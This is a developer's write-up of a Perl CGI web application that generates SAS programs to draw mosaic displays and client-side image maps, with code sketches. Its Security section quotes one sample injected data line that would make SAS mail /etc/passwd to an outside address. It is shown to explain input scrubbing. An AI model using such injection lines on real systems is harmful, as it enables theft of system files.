mosaics was written as a Perl server-based CGI script.
It could have been written as a Java application, which would have
provided a somewhat nicer user interface, but that would have limited the
application to those with Java-capable browsers. Think of
it as a Weblet for the Java-challenged.
Sources
- This Web application uses MOSAICS.SAS,
a SAS/IML application for the analysis of categorical data
using Mosaic Displays.
(MOSAICS.SAS has some additional features not available through
this forms interface.)
- The Web interface is written as a Perl script,
using Lincoln Stein's
Perl CGI Library, CGI.pm.
Thanks, Lincoln.
- PostScript to GIF conversion uses the pstogif
utility from
LaTeX2HTML
by Nikos Drakos.
- The JavaScript imagemaps technique comes from an example on
The JavaScript Workshop's
JavaScript Examples
collection.
- GIF size calculation was stolen from Andrew Tong's
gifsize
and Alex Knowle's
wwwimagesize.
How Does it Work?
The entire thing is done by the CGI script. After printing the forms, the program:
- retrieves the input parameters from the CGI query.
- reads and parses the data, either from a sample file, from the
form, or from an uploaded file.
- writes a SAS program, interpolating the user's data into a
template.
- runs the program (by a system() call), producing a PostScript file and one or more
files containing the imagemap information.
- converts each PostScript page to a GIF image.
- reads the imagemap information, massaging it into the form of
a client-side image map.
- reads and parses the SAS listing file to extract the Model
summary information.
- returns the image to the browser, together with links to the
SAS program, the output listing file, and a small JavaScript function
which activates the imagemap.
I cribbed the basic structure from my
Sieve Diagram script, but had learned a
bit in the interim.
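The step that runs the generated program can be sketched as follows. This is only an illustration, not the script's actual code: the wrapper name run_program is hypothetical, and the sketch runs Perl itself as a stand-in command so that it works on any machine. The real script would invoke SAS on the generated file at this point.

```perl
use strict;
use warnings;

# Hypothetical wrapper around system(); the list form bypasses the shell,
# so no part of a file name is interpreted as shell syntax.
sub run_program {
    my ($command, @args) = @_;
    my $status = system($command, @args);
    die "Could not start $command: $!\n" if $status == -1;
    return $status >> 8;     # exit code of the child process
}

# Stand-in command (the running Perl interpreter); an assumption made
# only so that the sketch is runnable without SAS installed.
my $exit = run_program($^X, '-e', 'exit 0');
print "exit code: $exit\n";
```

Checking the exit code before reading the PostScript and imagemap files gives the script a chance to report a failed run instead of parsing stale or missing output.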
Data Structure
Most form-based web applications need to get only a few numbers or
selections from the user, and it is not difficult to validate
these, either in the server CGI script or in the browser.
It is considerably harder to provide a general method for the user to input
a dataset -- a table consisting of an arbitrary number of numeric or character variables with an arbitrary number of observations (rows).
In the mosaics application, we need to:
- Read and parse the dataset, whatever its source.
- Extract variable names and variable types (character or numeric).
- Perform some consistency and validity checks.
- Construct the input to SAS which will create a valid SAS
dataset.
- Use the dataset information (variable names) in preparing the
program output.
SAS datasets consist of a data table plus a data dictionary,
and mosaics constructs something similar using a "hash", a
Perl data structure like an association list.
The $dataset structure (a reference to a hash) is shown below:
Contents | Perl constructor |
Dataset title (string) | $dataset->{TITLE} = $title; |
Number of rows (scalar) | $dataset->{ROWS} = $rows; |
Number of columns (scalar) | $dataset->{COLS} = scalar @col_type; |
Variable names (list) | $dataset->{VARS} = [ @vars ]; |
Variable types (list) | $dataset->{TYPE} = [ @col_type ]; |
Variable field width (list) | $dataset->{LENGTH} = [ @col_length ]; |
Data table (string) | $dataset->{DATA} = join("\n", @data); |
The data table itself is parsed as a list of its rows (@data), but then stored
as a newline-delimited string.
Variable types are stored as 'C' or 'N', with the rule that a variable is considered character
if its value in any row is not numeric (does not match /-?\d+/).
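A minimal sketch of how such a structure might be filled from whitespace-delimited text is given here. It rests on several assumptions that are not taken from the script: the helper name parse_dataset is hypothetical, the first line is assumed to hold the variable names, and the numeric test is an anchored variant of the pattern quoted above, extended to allow a decimal part.

```perl
use strict;
use warnings;

# Hypothetical helper: build the dataset hash from whitespace-delimited
# text whose first line holds the variable names (an assumption).
sub parse_dataset {
    my ($title, $text) = @_;
    my @lines = grep { /\S/ } split /\n/, $text;
    my @vars  = split ' ', shift @lines;
    my @col_type   = ('N') x @vars;      # numeric until proven otherwise
    my @col_length = (0) x @vars;
    my @data;
    foreach my $line (@lines) {
        my @fields = split ' ', $line;
        die "Expected " . @vars . " fields: $line\n" unless @fields == @vars;
        foreach my $i (0 .. $#fields) {
            # Anchored numeric test (assumed); one failure makes the column 'C'
            $col_type[$i] = 'C' unless $fields[$i] =~ /^-?\d+(?:\.\d+)?$/;
            $col_length[$i] = length $fields[$i]
                if length $fields[$i] > $col_length[$i];
        }
        push @data, join ' ', @fields;
    }
    my $dataset = {};
    $dataset->{TITLE}  = $title;
    $dataset->{ROWS}   = scalar @data;
    $dataset->{COLS}   = scalar @col_type;
    $dataset->{VARS}   = [ @vars ];
    $dataset->{TYPE}   = [ @col_type ];
    $dataset->{LENGTH} = [ @col_length ];
    $dataset->{DATA}   = join("\n", @data);
    return $dataset;
}

my $dataset = parse_dataset('Example',
    "HAIR EYE SEX COUNT\nBrown Black M 32\n");
print join(' ', @{ $dataset->{TYPE} }), "\n";   # prints "C C C N"
```

Rejecting rows with the wrong number of fields is one of the simple consistency checks that the structure makes possible.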
Security
Security is always a problem when form or uploaded data is passed to another
program.
We wouldn't like to be on the receiving end of a "dataset" which contained the following:
Fee Fie Fo Fum 234
Ima Gonna Get Ya 123
;;;; x "mail -s 'HaHa' cracker@net.net </etc/passwd";
The data therefore is scrubbed to remove all characters which should not appear in
ordinary data.
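The text does not say exactly which characters are removed, so the following is only a sketch of one whitelist approach. The function name scrub_line and the allowed character set (letters, digits, space, period, underscore, hyphen) are assumptions, not the script's actual rule.

```perl
use strict;
use warnings;

# Hypothetical whitelist scrubber: keep only characters that plausibly
# belong in a data table (the allowed set is an assumption).
sub scrub_line {
    my ($line) = @_;
    $line =~ tr/A-Za-z0-9 ._-//cd;   # delete every character not listed
    return $line;
}

my $evil = q{;;;; x "mail -s 'HaHa' cracker@net.net </etc/passwd";};
print scrub_line($evil), "\n";
```

The semicolon is the character that matters most here: a line containing one ends the datalines block in SAS, and whatever follows is then read as program statements rather than data.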
SAS Data Step
This data structure makes it fairly simple to perform some reasonable (but rudimentary)
validation on the dataset and variables, and to construct the SAS data step in a general way:
@vars = @{$dataset->{VARS}};
@type = @{$dataset->{TYPE}};
$data = $dataset->{DATA};          # newline-delimited data table
$invar = '';
foreach $i (0..$#vars) {           # construct input variable list
    $invar .= $vars[$i];
    $invar .= $type[$i] eq 'C' ? ' $ ' : ' ';   # '$' marks a character variable
}
$datastep = <<END_OF_DATASTEP;
data temp;
input $invar;
datalines;
$data
END_OF_DATASTEP
So, if the variables are HAIR, EYE, SEX (all character) and COUNT, the data step becomes:
data temp;
input HAIR $ EYE $ SEX $ COUNT;
datalines;
Brown Black M 32
...
Image Maps
MOSAICS.SAS maintains a table of the coordinates of all tiles in the
mosaic display. I wrote an add-in module to convert these coordinates
to a format which could be used as a client-side image map.
This was not straightforward, because:
- The mosaic uses a coordinate system with (0,0) as the lower left
corner of the bottom-left tile and (100,100) as the upper right corner
of the top-right tile. Imagemaps use a coordinate system in pixels,
with (0,0) as the top-left corner.
- That wouldn't be hard, except that there seems to be no reliable
way in SAS/IML to determine the bounding box of the entire figure
when the labels and title are added around the mosaic tiles.
This introduces slight errors in the imagemap coordinates of the
boxes, but these are now imperceptible except at high magnification.
Nonetheless, the SAS module does its best and produces a table
containing one row for each tile in the mosaic, with
the cell label, imagemap coordinates, and cell statistics
(observed frequency, fitted frequency, residual)
in the following format (chosen to be particularly
easy to parse in Perl):
Black:Brown| 69 435 211 915| 68 40.1 4.4
Black:Blue | 69 266 211 407| 20 39.2 -3.1
Black:Hazel| 69 131 211 237| 15 17.0 -0.5
Black:Green| 69 68 211 103| 5 11.7 -2.0
Brown:Brown| 239 598 614 915| 119 106.3 1.2
Brown:Blue | 239 346 614 570| 84 103.9 -1.9
Brown:Hazel| 239 173 614 317| 54 44.9 1.4
...
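Rows in this format can be taken apart with two calls to split, as in the sketch below. The function name parse_tile and the hash keys are hypothetical, and reading the four coordinates as x1, y1, x2, y2 is an assumption; the order of the statistics (observed, fitted, residual) follows the description above.

```perl
use strict;
use warnings;

# Hypothetical parser for one row of the tile table shown above.
sub parse_tile {
    my ($row) = @_;
    # Fields are separated by '|'; surrounding blanks are discarded.
    my ($label, $coords, $stats) = split /\s*\|\s*/, $row;
    my ($x1, $y1, $x2, $y2) = split ' ', $coords;   # assumed order
    my ($obs, $fit, $resid) = split ' ', $stats;
    return {
        LABEL  => $label,
        COORDS => [ $x1, $y1, $x2, $y2 ],
        OBS    => $obs,
        FIT    => $fit,
        RESID  => $resid,
    };
}

my $tile = parse_tile('Black:Blue | 69 266 211 407| 20 39.2 -3.1');
print "$tile->{LABEL}: residual $tile->{RESID}\n";
```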
Since the SAS program cannot know the size of the final
GIF image, it uses coordinates in the range of (0..1000).
mosaics extracts the actual size of the image from the
GIF file itself, and rescales these to the proper range.
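The size lookup and rescaling can be sketched as follows. This is not the code borrowed from gifsize or wwwimagesize, only an illustration of the idea: a GIF file starts with a 6-byte signature followed by the width and height as little-endian 16-bit integers. The function names gif_size and rescale are hypothetical, the header is built in memory as a stand-in for the first bytes of a real file, and the sketch assumes the 0..1000 coordinates already use the top-left origin of the imagemap.

```perl
use strict;
use warnings;

# Extract width and height from the first 10 bytes of a GIF: a 6-byte
# signature followed by two little-endian 16-bit integers.
sub gif_size {
    my ($header) = @_;
    my ($sig, $width, $height) = unpack 'a6 v v', $header;
    die "Not a GIF\n" unless $sig =~ /^GIF8[79]a$/;
    return ($width, $height);
}

# Rescale a coordinate from the 0..1000 range to pixels, rounding
# to the nearest integer.
sub rescale {
    my ($value, $pixels) = @_;
    return int($value * $pixels / 1000 + 0.5);
}

# Stand-in for the first bytes of a 400 x 300 image file (an assumption).
my $header = 'GIF89a' . pack('v v', 400, 300);
my ($w, $h) = gif_size($header);
my @coords  = (69, 266, 211, 407);
my @pixels  = (rescale($coords[0], $w), rescale($coords[1], $h),
               rescale($coords[2], $w), rescale($coords[3], $h));
print "@pixels\n";
```

With a real file, the header would be obtained by opening the GIF in binary mode and reading its first 10 bytes.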
mosaics uses these rescaled coordinates
to produce a client-side image map of the form:
<map name="mos1168i1">
<area shape=rect coords="0,20,42,276"
href="javascript:Show('Black','108','148.0','-3.3');">
<area shape=rect coords="51,20,165,276"
href="javascript:Show('Brown','286','148.0','11.3');">
<area shape=rect coords="174,20,202,276"
href="javascript:Show('Red','71','148.0','-6.3');">
<area shape=rect coords="211,20,262,276"
href="javascript:Show('Blond','127','148.0','-1.7');">
<area shape=default href="javascript:Show('Select a cell','','','');"
onMouseOver="window.status='Select a cell'; return true;">
</map>
The GIF image is connected to the image map by including the USEMAP=
attribute in the <IMG> tag.
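Generating markup of this shape from the parsed tiles is mostly string interpolation, as this sketch suggests. The function name image_map, the hash keys, and the file name mosaic.gif are hypothetical; the map name and the values of the first tile are taken from the example above.

```perl
use strict;
use warnings;

# Hypothetical generator: turn tile records into <area> tags like
# those shown above.
sub image_map {
    my ($name, @tiles) = @_;
    my $html = qq{<map name="$name">\n};
    foreach my $t (@tiles) {
        my $coords = join ',', @{ $t->{COORDS} };
        $html .= qq{<area shape=rect coords="$coords"\n}
               . qq{ href="javascript:Show('$t->{LABEL}','$t->{OBS}','$t->{FIT}','$t->{RESID}');">\n};
    }
    $html .= "</map>\n";
    return $html;
}

print image_map('mos1168i1',
    { LABEL => 'Black', COORDS => [ 0, 20, 42, 276 ],
      OBS => 108, FIT => '148.0', RESID => -3.3 });

# The image refers to the map by name, prefixed with '#'.
print qq{<img src="mosaic.gif" usemap="#mos1168i1">\n};
```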
To Do
- Add the ability to reorder the variables in the dataset. [Done, but
not well tested]
- Improve error trapping, particularly for entered or
uploaded data.
- Figure out how to serve each graph on a separate page, with
controls to navigate from one to the next.